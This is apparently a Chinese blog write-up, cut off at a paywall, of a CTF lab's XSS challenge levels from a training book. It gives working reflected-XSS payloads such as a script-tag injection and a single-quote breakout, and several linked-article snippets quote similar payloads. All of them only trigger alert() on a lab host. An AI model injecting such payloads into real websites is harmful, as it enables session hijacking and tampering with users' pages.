《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]XSS闯关

最新推荐文章于 2023-09-26 09:06:59 发布
最新推荐文章于 2023-09-26 09:06:59 发布
阅读量1.6k 收藏 3
点赞数 2
分类专栏: 《从0到1:CTFer成长之路》
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46703850/article/details/113992105
版权
本文是《从0到1:CTFer成长之路》书籍的配套练习,介绍了从第一关到第六关的XSS闯关挑战。每一关都详细解析了如何利用payload突破限制,包括对单引号的处理、重定向的利用、条件限制的解决以及AngularJS模板注入的逃逸方法。
摘要由CSDN通过智能技术生成

[第二章 web进阶]XSS闯关


介绍:记录一下笔记,方便以后迅速回忆使用。

《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》

在这里插入图片描述

  • 小技巧:
    如果想跳到直接坐后面的关卡,换数字就可以了,
    比如,
http://3b900675-201c-4b11-bc65-6d943150ccdd.node3.buuoj.cn/level1
换成
http://3b900675-201c-4b11-bc65-6d943150ccdd.node3.buuoj.cn/level6
就可以跳过前面的关卡直接开始做第6关,

第1关

  • 1.首页
    在这里插入图片描述

  • 这题比较简单就直接破解

  • payload

../level1?username=<script>alert("Hello xss!")</script>

在这里插入图片描述

第2关

  • 题目源码,输入的东西被单引号括住了
<script type="text/javascript">
    	if(location.search == ""){
   
    		location.search = "?username=xss"
    	}
    	var username = '<scr<script>ipt>alert("Hello xss!")</scr<script>ipt>';
    	document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
    </script>

-我们希望变成这个样子

var username = '';alert("Hello%20xss!")//';
  • payload:
../level2?username=%27;alert("Hello%20xss!");//
  • 进入下一关

第3关

  • 输入上一关的payload

  • 题目源码,这次过滤了单引号

最低0.47元/天 解锁文章
《从0到1:CTFer成长之路书籍配套题目-[第一章 web入门]常见的搜集
weixin_46703850的博客
02-09 1517
《从0到1:CTFer成长之路书籍配套题目,来源网站:《从0到1:CTFer成长之路
BUUCTF[第二章Web进阶]XSS闯关教程
最新发布
DMXA的博客
11-01 755
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
[第二章 web进阶]XSS闯关
qq_51558360的博客
03-04 2113
level1 ?username=<script>alert(1)</script> level2 查看源码 我们可以看到username被escape函数编码了,基本上就很难绕过。因此我们从username本身想办法。可以这样构造: ?username=';alert(1);// 这样username就是这样: var username = ‘’;alert(1);//’; 成功执行了alert(1)。 level3 输入上一关的payload 题目源码,这次过滤了单引
BUUCTF [第二章 web进阶]XSS闯关
m0_49025459的博客
04-12 1981
题目 第一关 这一关没有过滤直接修改url就行 ?username=<script>alert('xss')</script> 第二关 这一题样式没什么变化直接上源码 <html lang="zh"><head> <meta charset="UTF-8"> <title>XSS配套测试平台</title> <meta http-equiv="Content-Type"
BUUCTF[第二章 web进阶]XSS闯关
2301_78136321的博客
09-26 722
alert(1)</script>进行常规XSS注入。首先使用<script>alert(1)
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5775
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
[第二章 web进阶]xss闯关 1
04-10
XSS是指跨站脚本攻击。它是一种利用Web应用程序中的漏洞,向用户的浏览器中注入恶意代码的攻击方式。攻击者通过注入恶意代码,可以窃取用户的敏感信息,甚至控制用户的电脑。在Web应用程序中,应该采取安全措施,...
《从0到1:CTFer成长之路XSS漏洞
weixin_43072923的博客
12-17 3095
《从0到1:CTFer成长之路XSS漏洞
Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)
weixin_34319817的博客
09-12 294
什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻击的威力。 在黑客 XSS 攻击成功之后,攻击者能够对用户当前浏览的页面植入各种恶意脚本,通过恶意脚本来控制浏览器,这些脚本实质上就是 JavaScript 脚本(或者是其他浏览器可以运行的脚本),这...
从0到1CTFer成长之路-第二章-XSS的魔力
黑白的博客
03-01 811
XSS的魔力 声明 好好向大佬们学习!!! 攻击 XSS的魔力 这简直就是一场javascript的代码审计心酸历程 摘自 https://book.nu1l.com/tasks/#/ https://blog.csdn.net/hxhxhxhxx/article/details/112784856 https://blog.csdn.net/rfrder/article/details/108930033 使用BUUCTF在线环境 https://buuoj.cn/challenges 都是用谷歌浏.
《从0到1:CTFer成长之路书籍配套题目(不定时更)
BvxiE的博客
07-01 739
放出提示: 使用dirbuster工具进行网页目录扫描,⼯具是kali⾃带, 用URL Fuzz,可以指定目录,指定扫描admin目录下面的所有文件,dir代表字典的每一行 或者 额,,,没扫出来,尝试自己直接做 得到提示,访问可得: 得到提示,访问可得:flag2:s_v3ry_im 会得到一个文件 这题看了wp,软件还是没整明白,过几天再试试。 Git测试,使用GitHack脚本对其进行测试,教程!kali有自带的Git、Python2和Python3。转战虚拟机…主要我下半天GitHac
《从0到1:CTFer成长之路书籍配套题目-[第一章 web入门]SQL注入-1
weixin_46703850的博客
02-09 1038
《从0到1:CTFer成长之路书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
从0到1 CTFer成功之路XSS---学习笔记
aweiname2008的博客
11-15 3004
XSS 跨站脚本(Cross-Site Scripting,XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种,允许恶意用户将代码注入网页,其他用户在观看网页时会受到影响。 XSS攻击依然可以理解为在用户浏览器上的代码执行漏洞,可以在悄无声息的情况下实现模拟用户的操作(包括文件上传等请求) 2.3.1 XSS漏洞类型 反射型XSS:通常是指恶意代码未被服务器存储,每次触发漏洞的时候都将恶意代码通过GET/POST方式提交,然后触发漏洞。 存储型XSS:意代码被服务器存储,在访问页面时会直接被触发(如
N1BOOK XSS漏洞
SopRomeo的博客
12-27 636
level 1 反射型XSS 观察url username=<script>alert(1)</script> level 2 查看源代码发现 这里做了编码 因为本身是放在script标签里,只需要闭合就可 username=123';alert(1);// level 3 无果 换一个标签后发现可行 username=<img src="javacript::alert(1)" onclick="alert(1);"> level 4 会进行重定向 可
xss闯关笔记
lls的博客
03-06 4001
leve 1 第一关没有任何过滤 直接上绝活: ?username=<script>alert(1)</script> level2 f12看一下源码: 这里发现使用escape()所以这里没有办法注入,但是 username=? 这里是可以注入的,这里发现变量是单引号闭合的,所以构造 ?username=';alert(1);// 这样就成功注入了 level3 这里我们模仿上一关的思路 构造之后发现单引号被转义了 没关系,一个单引号被过滤没关系 我们可以用多个来绕过
从0到1CTFer成长之路-第二章-Web文件上传漏洞
黑白的博客
03-01 3688
Web文件上传漏洞 声明 好好向大佬们学习!!! 攻击 文件上传漏洞 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://3e8b5e24-d936-4a8f-9d1b-15ee36321db8.node3.buuoj.cn 一个上传文件功能,随便点点看,点到了提交查询,发现只能上传zip、jpg、gif、png,看看怎么绕过过滤上传 我的文件上传本来就薄弱,这个题也确实很打击我.
BUUCTF_N1BOOK_[第二章 web进阶]文件上传_详解
weixin_43852034的博客
03-04 1221
最后的小插曲:本来以为上传成功之后,用蚁剑砍进去就完事儿了,结果发现居然会报错:嗯???于是直接访问一下上传后的文件:没想到直接得到了flag…后续又把2.php.xxx文件的内容修改为?尝试了一下,发现访问后也是同样的效果。那大概是环境本身做了限制吧…思路应该是没错的,蚁剑虽然说没砍进去…但你就说flag拿没拿到吧!
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值